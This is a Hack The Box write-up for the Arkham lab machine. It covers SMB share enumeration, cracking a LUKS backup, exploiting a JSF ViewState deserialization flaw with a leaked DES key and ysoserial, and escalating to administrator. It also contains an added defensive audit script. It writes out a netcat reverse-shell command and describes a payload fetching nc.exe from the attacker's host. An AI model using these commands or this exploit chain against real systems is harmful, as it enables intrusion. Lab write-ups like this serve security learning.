# Hack The Box - Arkham

## Quick Summary

Hey guys, today Arkham retired and here's my write-up about it. This box was a challenging one and I enjoyed it a lot; it had an interesting Java deserialization vulnerability, which is the best thing about this box. Despite the fact that some parts were annoying, this box was great. It's a Windows box and its IP is 10.10.10.130; I added it to /etc/hosts as arkham.htb. Let's jump right in!

## Nmap

As always we will start with nmap to scan for open ports and services:

`nmap -sV -sT -sC arkham.htb`

We have HTTP on ports 80 and 8080, and SMB; I checked SMB first.

## SMB

Let's use smbclient to list the shares:

Users is an interesting share name; I checked it and it had the directories for the Guest and default users:

I enumerated it for some time but I couldn't find anything useful, so I checked BatShare, which had a zip archive called appserver.zip:

I downloaded it (`get appserver.zip`), then I started to examine it.

## Decrypting the Backup Image (LUKS Encrypted Image)

After unzipping appserver.zip I got 2 files, IMPORTANT.txt and backup.img.

IMPORTANT.txt was a note from Bruce to Alfred telling him that this is the backup image from their Linux server:

backup.img was a LUKS encrypted image:

We can attempt to open it with cryptsetup, but of course we will need a password:

We can use a tool called bruteforce-luks to bruteforce the password, but using it with rockyou would take a very long time. The box so far has a lot of Batman references, like the names Alfred, Bruce and Joker, the share name BatShare, and also the comment of that share: Master Wayne's secrets.
I took all the passwords from rockyou that had batman in them and created a custom list:

It worked and the password was batmanforever.

It had a directory called Mask, so I copied it and then unmounted the image.

There was some useless stuff that I didn't really care about, but there was also a directory called tomcat-stuff which had some web server configuration files; that one was interesting.

We have the server configuration files; however, we haven't checked any of the HTTP ports yet.

## HTTP Enumeration

Port 80 had nothing running; there was only the default IIS index page and no subdirectories.

On port 8080 there was a website with some links:

One of the links was the subscription link: http://arkham.htb:8080/userSubscribe.faces

I tested it to see what would happen:

Nothing interesting, so I intercepted the request with Burp and found some interesting parameters in the POST request:

## JSF ViewState Deserialization Vulnerability

The page had a .faces extension and the POST request had a parameter called javax.faces.ViewState.
After some research I learned that this parameter holds a Java serialized object, which means there is a potential deserialization vulnerability.

Some resources if you are unfamiliar with deserialization vulnerabilities:

When I tried to decode the base64-encoded value I got nothing readable:

I redirected the output into a file and ran the `file` command against it, and I got "data" instead of "Java serialization data".
This means that the serialized data is encrypted. Luckily we have the server configuration files; it's time to check them.
In web.xml.bak I found the key used to encrypt the data, and also the MAC algorithm, which was hmac-sha1, and the key it used.

The same key was used: SnNGOTg3Ni0=. It's base64 encoded, so we need to decode it:

The key is JsF9876-.
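From the defender's side, the real finding here is the configuration itself: a client-side ViewState, DES, and a short key that is also used for the MAC, all sitting in a backup of web.xml. The following Python audit is an added example, not part of the write-up or the box; it reads a web.xml and reports those weaknesses. The context-param names are the ones Apache MyFaces uses for its state encryption (an assumption: verify them against your MyFaces version), and both web.xml samples are constructed, the weak one reusing the settings recovered above.

```python
# Added example, not from the write-up: audit a MyFaces web.xml for the ViewState
# weaknesses this box exposed. Param names follow Apache MyFaces (assumption).
import base64
import xml.etree.ElementTree as ET
# What MyFaces assumes when a param is missing (assumption: check your version).
DEFAULTS = {"javax.faces.STATE_SAVING_METHOD": "server",
            "org.apache.myfaces.USE_ENCRYPTION": "true",
            "org.apache.myfaces.ALGORITHM": "DES"}

def context_params(xml_text):
    # {param-name: param-value} for every <context-param>, namespace-agnostic.
    params = {}
    for cp in ET.fromstring(xml_text).iter():
        if cp.tag.split("}")[-1] == "context-param":
            f = {c.tag.split("}")[-1]: (c.text or "").strip() for c in cp}
            if "param-name" in f:
                params[f["param-name"]] = f.get("param-value", "")
    return params

def audit(xml_text):
    # Returns finding codes; an empty list means none of the checked weaknesses.
    p = {**DEFAULTS, **context_params(xml_text)}
    findings = []
    if p["javax.faces.STATE_SAVING_METHOD"].lower() == "client":
        findings.append("client-side-state")   # serialized state is handed to the browser
    if p["org.apache.myfaces.USE_ENCRYPTION"].lower() != "true":
        findings.append("encryption-disabled")
    if p["org.apache.myfaces.ALGORITHM"].upper() == "DES":
        findings.append("des-cipher")          # 56-bit key
    secret = p.get("org.apache.myfaces.SECRET")
    if secret is not None:
        findings.append("secret-in-web-xml")   # a .bak of this file is how the key leaked
        if len(base64.b64decode(secret)) < 16:
            findings.append("short-secret")    # JsF9876- decodes to 8 bytes
        if p.get("org.apache.myfaces.MAC_SECRET") == secret:
            findings.append("mac-key-reuses-cipher-key")
    return findings

# Constructed sample mirroring the settings recovered from web.xml.bak on the box.
WEAK_WEB_XML = """<web-app>
 <context-param><param-name>javax.faces.STATE_SAVING_METHOD</param-name><param-value>client</param-value></context-param>
 <context-param><param-name>org.apache.myfaces.SECRET</param-name><param-value>SnNGOTg3Ni0=</param-value></context-param>
 <context-param><param-name>org.apache.myfaces.MAC_ALGORITHM</param-name><param-value>HmacSHA1</param-value></context-param>
 <context-param><param-name>org.apache.myfaces.MAC_SECRET</param-name><param-value>SnNGOTg3Ni0=</param-value></context-param>
</web-app>"""
# Constructed hardened counterpart: state stays server-side, no key in the file.
HARDENED_WEB_XML = """<web-app>
 <context-param><param-name>javax.faces.STATE_SAVING_METHOD</param-name><param-value>server</param-value></context-param>
 <context-param><param-name>org.apache.myfaces.ALGORITHM</param-name><param-value>AES</param-value></context-param>
</web-app>"""
```

Run `audit(WEAK_WEB_XML)` to see every finding fire on the recovered settings, and `audit(HARDENED_WEB_XML)` to see the server-side variant pass clean.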
We have everything we need to encrypt the data correctly, so I wrote a Python script to do it.
Basically I'm going to create the payload with ysoserial, then use my script to encrypt it.
viewstate.py:

This script has two functions, encrypt() and hmac_sig(). encrypt() takes the payload generated by ysoserial, DES-encrypts it using the key and returns the encrypted payload. hmac_sig() takes the encrypted payload and generates the HMAC signature that will be appended to the encrypted payload.
The script takes two arguments. The first one is the filename that contains the ysoserial-generated payload; the script encrypts it, generates the HMAC signature, appends it to the encrypted payload, base64-encodes the final payload and URL-encodes it. Then it saves the payload into the output file, which is the second argument.
Time to use ysoserial. We run into the problem of which payload to use; I used CommonsCollections5 and it worked.
I created two payloads: the first one downloads nc.exe from my box and saves it in C:\windows\system32\spool\drivers\color, the second one executes the reverse shell command: nc.exe -e cmd.exe 10.10.xx.xx 1337

Then I encrypted them with my script:

I ran a Python server to host nc.exe and started my nc listener on port 1337, then I sent the payloads.
1st request:

Response:

I got a 500, and when I checked my Python server I saw that I got a request, so everything was fine.
2nd request:

Response:

Then I checked my listener, and:

We owned user!
I also scripted this, because copying and pasting in Burp wasn't my favorite thing and it only takes 2 minutes to script this in Python:

## Shell as Batman

We are on the box as Alfred. I enumerated the directories and found a directory called backups in C:\Users\Alfred\Downloads; it had a zip archive called backup.zip:

I wanted to get it on my box, so I used nc to do it. I listened on port 1338, then on the box I did this:

And I successfully got the file:

The archive only had a file called alfred@arkham.local.ost, which is an Outlook email folder, so I used readpst to convert it.

The output was saved in Drafts.mbox; I removed the long useless output:

We can see two interesting things here: the first one is this message, "Master Wayne stop forgetting your password", and the second one is the base64-encoded image. I decoded it and saved it:

image001.png:

Great, we have the password for Batman. By checking Batman's local group memberships we can see that Batman is in the Administrators group, and also in the Remote Management Users group:

So we can use PowerShell's Invoke-Command with the credentials we have to get a reverse shell:

## Root Flag

Batman is in the Administrators group; however, I couldn't read the flag:

That was weird. After trying a lot of things, I wanted to see if anything would change if I mounted C$ and then accessed it.

And yes, that worked:

We owned root!
That's it, feedback is appreciated!